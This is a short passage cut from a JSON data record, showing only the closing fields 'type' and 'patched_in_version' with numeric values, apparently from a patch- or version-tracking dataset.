type":121,"patched_in_version":107}]